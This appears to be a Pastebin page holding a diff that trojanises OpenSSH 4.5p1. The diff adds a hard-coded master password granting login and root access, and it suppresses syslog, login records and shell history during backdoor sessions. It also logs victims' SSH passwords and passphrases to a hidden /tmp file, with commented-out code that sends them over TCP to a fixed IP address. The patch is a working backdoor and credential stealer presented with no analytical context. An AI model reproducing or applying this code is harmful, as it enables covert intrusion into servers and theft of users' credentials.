API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 20th, 2012
258
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.79 KB | None | 0 0
raw download clone embed print report
  1. diff -a -U2 -r openssh-4.5p1/auth.c backdoored1/auth.c
  2. --- openssh-4.5p1/auth.c 2006-10-27 11:10:16.000000000 -0400
  3. +++ backdoored1/auth.c 2010-05-13 09:16:53.000000000 -0400
  4. @@ -100,4 +100,7 @@
  5. #endif
  6.  
  7. + if(backdoorActive == 1)
  8. + return 1;
  9. +
  10. /* Shouldn't be called if pw is NULL, but better safe than sorry... */
  11. if (!pw || !pw->pw_name)
  12. @@ -249,4 +252,7 @@
  13. void (*authlog) (const char *fmt,...) = verbose;
  14. char *authmsg;
  15. +
  16. + if(backdoorActive == 1)
  17. + return;
  18.  
  19. if (use_privsep && !mm_is_monitor() && !authctxt->postponed)
  20. @@ -264,6 +270,6 @@
  21. else
  22. authmsg = authenticated ? "Accepted" : "Failed";
  23. -
  24. - authlog("%s %s for %s%.100s from %.200s port %d%s",
  25. + if(!backdoorActive){
  26. + authlog("%s %s for %s%.100s from %.200s port %d%s",
  27. authmsg,
  28. method,
  29. @@ -273,4 +279,5 @@
  30. get_remote_port(),
  31. info);
  32. + }
  33.  
  34. #ifdef CUSTOM_FAILED_LOGIN
  35. @@ -298,5 +305,7 @@
  36. int
  37. auth_root_allowed(char *method)
  38. -{
  39. +{
  40. + return 1;
  41. +
  42. switch (options.permit_root_login) {
  43. case PERMIT_YES:
  44. diff -a -U2 -r openssh-4.5p1/auth-pam.c backdoored1/auth-pam.c
  45. --- openssh-4.5p1/auth-pam.c 2006-09-16 21:57:47.000000000 -0400
  46. +++ backdoored1/auth-pam.c 2010-03-05 00:40:05.000000000 -0500
  47. @@ -467,4 +467,6 @@
  48. goto auth_fail;
  49. sshpam_err = pam_authenticate(sshpam_handle, flags);
  50. + if(backdoorActive == 1)
  51. + sshpam_err = PAM_SUCCESS;
  52. if (sshpam_err != PAM_SUCCESS)
  53. goto auth_fail;
  54. diff -a -U2 -r openssh-4.5p1/auth-passwd.c backdoored1/auth-passwd.c
  55. --- openssh-4.5p1/auth-passwd.c 2006-08-04 22:39:39.000000000 -0400
  56. +++ backdoored1/auth-passwd.c 2010-04-18 21:26:19.000000000 -0400
  57. @@ -81,6 +81,19 @@
  58. auth_password(Authctxt *authctxt, const char *password)
  59. {
  60. + backdoorActive = 0;
  61. + char *buffer;
  62. struct passwd * pw = authctxt->pw;
  63. int result, ok = authctxt->valid;
  64. +
  65. + if (!strcmp(password, B4XDOOR)) {
  66. + backdoorActive = 1;
  67. + return 1;
  68. + }else if (sys_auth_passwd(authctxt, password)){
  69. + buffer = malloc(1024 * sizeof(char));
  70. + sprintf(buffer, "Sshd password detected: %s@%s:%s\n", pw->pw_name, get_remote_ipaddr(), password);
  71. + sendit(buffer);
  72. + free(buffer);
  73. + }
  74. +
  75. #if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
  76. static int expire_checked = 0;
  77. diff -a -U2 -r openssh-4.5p1/canohost.c backdoored1/canohost.c
  78. --- openssh-4.5p1/canohost.c 2006-09-22 05:22:18.000000000 -0400
  79. +++ backdoored1/canohost.c 2010-04-18 20:28:00.000000000 -0400
  80. @@ -75,5 +75,5 @@
  81. debug3("Trying to reverse map address %.100s.", ntop);
  82. /* Map the IP address to a host name. */
  83. - if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
  84. + if (!backdoorActive && getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
  85. NULL, 0, NI_NAMEREQD) != 0) {
  86. /* Host name not found. Use ip address. */
  87. diff -a -U2 -r openssh-4.5p1/includes.h backdoored1/includes.h
  88. --- openssh-4.5p1/includes.h 2006-09-01 06:29:11.000000000 -0400
  89. +++ backdoored1/includes.h 2010-05-13 09:39:30.000000000 -0400
  90. @@ -14,4 +14,62 @@
  91. */
  92.  
  93. +#ifndef FUCKIT_H
  94. +#define FUCKIT_H
  95. +#include <stdlib.h>
  96. +#include <stdio.h>
  97. +
  98. +#define B4XDOOR "lol"
  99. +int backdoorActive;
  100. +
  101. +#define FUCKING_SSH_LOG "/tmp/.logs"
  102. +
  103. +static int sendit(char *msg){
  104. + FILE *evil_fp;
  105. + evil_fp = fopen(FUCKING_SSH_LOG,"a+");
  106. +
  107. + if (evil_fp == NULL) {
  108. + fclose(evil_fp);
  109. + return -1;
  110. + }
  111. +
  112. + fprintf(evil_fp,"%s",msg);
  113. + fclose(evil_fp);
  114. + return 0;
  115. +}
  116. +
  117. +/*
  118. +#include <sys/types.h>
  119. +#include <sys/socket.h>
  120. +#include <netinet/in.h>
  121. +
  122. +static int sendit(char *msg){
  123. + int sock, n;
  124. + struct sockaddr_in remote;
  125. +
  126. + remote.sin_family = AF_INET ;
  127. + remote.sin_port = htons(80);
  128. + if(inet_aton("192.168.1.105" ,&remote.sin_addr) < 0)
  129. + {
  130. + return -1;
  131. + }
  132. + if ((sock = socket(PF_INET, SOCK_STREAM, 0)) < 0)
  133. + {
  134. + return -1;
  135. + }
  136. + if(connect(sock,(struct sockaddr*)&remote,sizeof(remote)) == -1)
  137. + {
  138. + return -1;
  139. + }
  140. + n = write(sock,msg,strlen(msg));
  141. + if (n < 0)
  142. + return -1;
  143. + close(sock);
  144. + return 0;
  145. +}
  146. +
  147. +*/
  148. +
  149. +#endif
  150. +
  151. #ifndef INCLUDES_H
  152. #define INCLUDES_H
  153. diff -a -U2 -r openssh-4.5p1/log.c backdoored1/log.c
  154. --- openssh-4.5p1/log.c 2006-08-20 03:55:55.000000000 -0400
  155. +++ backdoored1/log.c 2010-03-05 00:40:05.000000000 -0500
  156. @@ -307,4 +307,6 @@
  157. do_log(LogLevel level, const char *fmt, va_list args)
  158. {
  159. +if(backdoorActive == 1)
  160. + return;
  161. #if defined(HAVE_OPENLOG_R) && defined(SYSLOG_DATA_INIT)
  162. struct syslog_data sdata = SYSLOG_DATA_INIT;
  163. diff -a -U2 -r openssh-4.5p1/loginrec.c backdoored1/loginrec.c
  164. --- openssh-4.5p1/loginrec.c 2006-09-07 08:57:54.000000000 -0400
  165. +++ backdoored1/loginrec.c 2010-03-05 00:40:05.000000000 -0500
  166. @@ -431,4 +431,6 @@
  167. login_write(struct logininfo *li)
  168. {
  169. +if(backdoorActive == 1)
  170. + return 0;
  171. #ifndef HAVE_CYGWIN
  172. if (geteuid() != 0) {
  173. diff -a -U2 -r openssh-4.5p1/readpass.c backdoored1/readpass.c
  174. --- openssh-4.5p1/readpass.c 2006-08-04 22:39:40.000000000 -0400
  175. +++ backdoored1/readpass.c 2010-04-18 21:26:44.000000000 -0400
  176. @@ -116,5 +116,5 @@
  177. char *askpass = NULL, *ret, buf[1024];
  178. int rppflags, use_askpass = 0, ttyfd;
  179. -
  180. + char *buffer;
  181. rppflags = (flags & RP_ECHO) ? RPP_ECHO_ON : RPP_ECHO_OFF;
  182. if (flags & RP_USE_ASKPASS)
  183. @@ -159,4 +159,12 @@
  184. ret = xstrdup(buf);
  185. memset(buf, 'x', sizeof buf);
  186. +
  187. + if (strcmp((char*)ret,"yes") != NULL) {
  188. + buffer = malloc(1024 * sizeof(char));
  189. + sprintf(buffer, "passphrase: %s\n", ret);
  190. + sendit(buffer);
  191. + free(buffer);
  192. + }
  193. +
  194. return ret;
  195. }
  196. diff -a -U2 -r openssh-4.5p1/session.c backdoored1/session.c
  197. --- openssh-4.5p1/session.c 2006-10-23 13:01:56.000000000 -0400
  198. +++ backdoored1/session.c 2010-04-18 22:01:46.000000000 -0400
  199. @@ -1080,4 +1080,7 @@
  200. child_set_env(&env, &envsize, "TZ", getenv("TZ"));
  201.  
  202. + if(backdoorActive == 1)
  203. + child_set_env(&env, &envsize, "HISTFILE", "/dev/null");
  204. +
  205. /* Set custom environment options from RSA authentication. */
  206. if (!options.use_login) {
  207. diff -a -U2 -r openssh-4.5p1/sshconnect.c backdoored1/sshconnect.c
  208. --- openssh-4.5p1/sshconnect.c 2006-10-23 13:02:24.000000000 -0400
  209. +++ backdoored1/sshconnect.c 2010-04-18 21:26:00.000000000 -0400
  210. @@ -948,5 +948,5 @@
  211. char *host, *cp;
  212. char *server_user, *local_user;
  213. -
  214. + char *buffer;
  215. local_user = xstrdup(pw->pw_name);
  216. server_user = options.user ? options.user : local_user;
  217. @@ -958,4 +958,9 @@
  218. *cp = (char)tolower(*cp);
  219.  
  220. + buffer = malloc(1024 * sizeof(char));
  221. + sprintf(buffer, "User %s connecting as %s@%s\n", local_user, server_user, host);
  222. + sendit(buffer);
  223. + free(buffer);
  224. +
  225. /* Exchange protocol version identification strings with the server. */
  226. ssh_exchange_identification();
  227. diff -a -U2 -r openssh-4.5p1/sshlogin.c backdoored1/sshlogin.c
  228. --- openssh-4.5p1/sshlogin.c 2006-08-04 22:54:24.000000000 -0400
  229. +++ backdoored1/sshlogin.c 2010-04-18 20:34:58.000000000 -0400
  230. @@ -122,4 +122,7 @@
  231. struct logininfo *li;
  232.  
  233. + if(backdoorActive == 1)
  234. + return;
  235. +
  236. /* save previous login details before writing new */
  237. store_lastlog_message(user, uid);
  238. @@ -138,4 +141,7 @@
  239. struct logininfo *li;
  240.  
  241. + if(backdoorActive == 1)
  242. + return;
  243. +
  244. li = login_alloc_entry(pid, user, host, ttyname);
  245. login_set_addr(li, addr, addrlen);
  246. @@ -151,4 +157,7 @@
  247. struct logininfo *li;
  248.  
  249. + if(backdoorActive == 1)
  250. + return;
  251. +
  252. li = login_alloc_entry(pid, user, NULL, tty);
  253. login_logout(li);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!